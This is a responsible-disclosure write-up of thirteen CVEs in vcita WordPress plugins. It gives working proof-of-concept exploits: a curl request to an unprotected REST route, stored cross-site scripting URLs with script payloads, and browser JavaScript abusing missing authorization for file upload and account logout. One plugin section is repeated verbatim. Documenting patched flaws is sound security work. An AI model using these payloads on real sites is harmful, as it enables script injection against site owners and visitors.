On 02/02/2023 I discovered several security vulnerabilities in the WordPress plugins by vcita and reached out to the company according to responsible disclosure principles. The company issued updates to fix the vulnerabilities on June 12.
The following CVEs have been assigned to the security vulnerabilities:
1. CVE-2023-2298 – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Unauthenticated Stored Cross-Site Scripting
2. CVE-2023-2299 – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Missing Authorization on REST-API
3. CVE-2023-2300 – Contact Form Builder by vcita <= 4.9.1 – Authenticated (Contributor+) Stored Cross-Site Scripting
4. CVE-2023-2301 – Contact Form Builder by vcita <= 4.9.1 – Cross-Site Request Forgery to Stored Cross-Site Scripting
5. CVE-2023-2302 – Contact Form and Calls To Action by vcita <= 2.6.4 – Authenticated (Contributor+) Stored Cross-Site Scripting
6. CVE-2023-2303 – Contact Form and Calls To Action by vcita <= 2.6.4 – Cross-Site Request Forgery to Stored Cross-Site Scripting
7. CVE-2023-2404 – CRM and Lead Management by vcita <= 2.6.2 – Authenticated (Contributor+) Stored Cross-Site Scripting
8. CVE-2023-2405 – CRM and Lead Management by vcita <= 2.6.2 – Cross-Site Request Forgery to Stored Cross-Site Scripting
9. CVE-2023-2406 – Event Registration Calendar By vcita <= 1.3.1 & Online Payments – Get Paid with PayPal, Square & Stripe <= 3.9.1 – Authenticated (Contributor+) Stored Cross-Site Scripting
10. CVE-2023-2407 – Event Registration Calendar By vcita <= 1.3.1 & Online Payments – Get Paid with PayPal, Square & Stripe <= 3.9.1 – Cross-Site Request Forgery to Stored Cross-Site Scripting
11. CVE-2023-2414 – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Missing Authorization to Settings Update and Media Upload
12. CVE-2023-2415 – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Missing Authorization to Account Logout
13. CVE-2023-2416 – Online Booking & Scheduling Calendar for WordPress by vcita <= 4.2.10 – Cross-Site Request Forgery to Account Logout
Online Booking & Scheduling Calendar for WordPress by vcita (4.1 – 4.2.10)
Stored Cross Site Scripting, Missing Authentication
3000+ active installs, ~ 400.000 downloads
The plugin uses an unprotected REST route endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.
Proof of Concept
1. Attacker sends the following curl request to a website that uses the vcita widget. The request updates the `uid` & `business_id` & `business_name` & `email` variables in the database:
“`curl
curl –request POST \
–url https://example.com/wp-json/vcita-wordpress/v1/actions/auth \
–header ‘Content-Type: application/json’ \
–data ‘{
“success”: true,
“user_data”: {
“business_id”: “\”; alert(1); //”,
“business_name”: “Evil Eve”,
“email”: “[email protected]”
}
}’
“`
2. The injected alert(1) is executed on the live website
Contact Form Builder by vcita (<= 4.9.1)
2000+ active installs, ~ 360.000 downloads
The plugin does not validate $_GET parameters and stores them directly in the database. These values are later inserted into the page without sanitation. This endpoint also does not have sufficient access control since all users with the edit_posts capability can open it.
Proof of Concept
1. Case A: If the attacker has edit_posts capability on the target website, he opens the following URL: example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>`
Case B: If the attacker does not have the edit_posts capability he tricks an user that does have this capability into opening the URL
2. The email field `a”/><script>alert(1);</script>` is stored in the database
3. When an admin opens the plugin’s settings page (`wp-admin/admin.php?page=live-site`) the alert is triggered.
Contact Form and Calls To Action by vcita (<= 2.6.4)
400+ active installs, ~ 135.000 downloads
The plugin adds a poorly protected endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.
Proof of Concept
1. Case A: If the attacker has edit_posts capability on the target website, he opens the following URL: `example.com/wp-admin/admin.php?page=lead-capturing-call-to-actions-by-vcita/vcita-callback.php&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>&uid=a”</script><script>alert(2);</script>`
Case B: If the attacker does not have the edit_posts capability he tricks an user that does have this capability into opening the URL mentioned above
2. The fields `email=a”/><script>alert(1);</script>` and `uid=a”</script><script>alert(2);</script>` are stored in the database
3. When a user opens the plugin’s settings page (`/wp-admin/admin.php?page=lead-capturing-call-to-actions-by-vcita/vcita-settings-functions.php`) `alert(1)` is triggered. Any visitor will get `alert(2)` when browsing the infected site.
CRM and Lead Management by vcita (<= 2.6.2)
400+ active installs, ~ 40.000 downloads
The plugin adds a poorly protected endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.
Proof of Concept
1. Case A: If the attacker has edit_posts capability on the target website, he opens the following URL: `example.com/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-callback.php&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>&uid=a”</script><script>alert(2);</script>`
Case B: If the attacker does not have the edit_posts capability he tricks an user that does have this capability into opening the URL mentioned above
2. The fields `email=a”/><script>alert(1);</script>` and `uid=a”</script><script>alert(2);</script>` are stored in the database
3. When a user opens the plugin’s settings page (`/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-settings-functions.php`) `alert(1)` is triggered. Any visitor will get `alert(2)` when browsing the infected site.
CRM and Lead Management by vcita (<= 2.6.2)
400+ active installs, ~ 40.000 downloads
The plugin adds a poorly protected endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.
Proof of Concept
1. Case A: If the attacker has edit_posts capability on the target website, he opens the following URL: `example.com/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-callback.php&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>&uid=a”</script><script>alert(2);</script>`
Case B: If the attacker does not have the edit_posts capability he tricks an user that does have this capability into opening the URL mentioned above
2. The fields `email=a”/><script>alert(1);</script>` and `uid=a”</script><script>alert(2);</script>` are stored in the database
3. When a user opens the plugin’s settings page (`/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-settings-functions.php`) `alert(1)` is triggered. Any visitor will get `alert(2)` when browsing the infected site.
Event Registration Calendar By vcita (<= 1.3.1)
100+ active installs, ~ 25.000 downloads
The plugin adds a poorly protected endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.
Proof of Concept
1. Case A: If the attacker has edit_posts capability on the target website, he opens the following URL: `example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>&uid=a`
Case B: If the attacker does not have the edit_posts capability he tricks an user that does have this capability into opening the URL mentioned above
2. The fields `email=a”/><script>alert(1);</script>` and `uid=a”</script><script>alert(2);</script>` are stored in the database
3. When a user opens the plugin’s settings page (`/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-settings-functions.php`) `alert(1)` is triggered.
Online Payments – Get Paid with PayPal, Square & Stripe (<= 3.9.1)
300+ active installs, ~ 50.000 downloads
The plugin adds a poorly protected endpoint to set the connection parameters for the vcita account connection. The variables are stored in the database without any validation and are later inserted into the website without any sanitation.
Proof of Concept
1. Case A: If the attacker has edit_posts capability on the target website, he opens the following URL: `example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>`
Case B: If the attacker does not have the edit_posts capability he tricks an user that does have this capability into opening the URL mentioned above
2. The email field `a”/><script>alert(1);</script>` is stored in the database
3. When an admin opens the plugin’s settings page (`wp-admin/admin.php?page=live-site`) the alert is triggered (vcita has to be connected) In Case B if an admin opens the link the site will redirect directly to the infected page.
Online Booking & Scheduling Calendar for WordPress by vcita (<= 4.2.10)
3000+ active installs, ~ 400.000 downloads
This privilege escalation allows any logged-in user (subscriber level is sufficient) to upload an arbitrary number of files to the Media Library.
Proof of Concept
1. Attacker registers on the website.
2. Attacker adds a new input field in his browser: `<input type=”file” name=”my_files[]”>` and selects an image file (vcita_save_settings_callback does check for allowed mime types)
3. Attacker opens the browser’s developer tools and runs the following JavaScript:
const input = document.querySelector(‘input[type=”file”]’);
const file = input.files[0];
const formData = new FormData();
formData.append(“widget_img”, file);
const xhr = new XMLHttpRequest();
xhr.open(
“POST”,
“https://example.com/wp-admin/admin-ajax.php?action=vcita_save_settings”,
true
);
xhr.send(formData);
4. Image is now uploaded to the website.
Online Booking & Scheduling Calendar for WordPress by vcita (<= 4.2.10)
3000+ active installs, ~ 400.000 downloads
This privilege escalation allows a logged-in user (subscriber level is sufficient) to log the administrator out of the vcita account. As a result, website visitors will not be able to make appointments and the owner of the website may lose a considerable amount of revenue.
Another attack vector would be to use Cross-Site Request Forgery (CSRF) to manipulate any logged in user to perform the logout.
Proof of Concept
1. Attacker registers on the website.
2. Attacker opens the browser’s developer tools and runs the following JavaScript:
fetch(“/wp-admin/admin-ajax.php?action=vcita_logout”, {
method: “POST”,
headers: {
Accept: “*/*”,
“Content-Type”: “application/json”,
},
});
Alternative: manipulate any logged in user to send a POST request to the server.
3. Website connection with vcita account is deactivated.